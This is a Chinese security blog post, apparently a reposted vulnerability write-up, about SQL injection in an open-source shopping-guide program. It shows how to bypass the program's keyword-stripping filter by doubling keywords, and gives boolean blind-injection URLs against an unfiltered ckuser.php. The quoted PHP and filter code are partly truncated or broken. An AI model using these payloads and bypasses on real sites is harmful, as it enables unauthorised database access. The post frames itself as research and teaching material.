作者:Samy,blog:http://hi.baidu.com/0x7362/blog
渗透一个站时 搞C段碰到的一个站。由于程序是开源程序
并下载其程序看了一番。其实程序员还是有一点安全意识的:
防注入代码:
//要过滤的非法字符
$ArrFiltrate = array ( "#union#i", "#
这段代码多少还是有瑕疵的、把诸如:union 行关键字替换为空
绕过方法:select 换成sselectelect
union 换成 uunionnion
另外只过滤get post提交的数据
别一个文件并没有调用防注入程序,导致字符注入、但受gpc影响
header("Content-Type:text/html;charset=utf-8"); $uname = trim($_GET["name"]); if($uname==''){ echo "true"; }else{ $con = @mysql_connect("$dbserver","$dbuser","$dbpass" )or die(ERR_DB); mysql_select_db("$dbname",$con)or die("can not choose the dbname!"); mysql_query("set names utf8"); $res=mysql_query($query); {echo "true";} else {echo "false";} }
首先注册一个用户.让程序能过判断
ckuser.php?name=maxadd' and 1=1 and ''='
ckuser.php?name=maxadd' and 1=2 and ''='
返回 false
文章来源于lcx.cc:多多淘宝客V7.4 注入漏洞
By:wooden,From:http://t00ls.net/viewthread.php?tid=17312。 转载请注明出处。 考虑到站点的影响力过大,全文不截图,怕漏点,大家担待 编辑:文章得到热烈响应,在下非常高兴,感谢皇子的提醒net…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论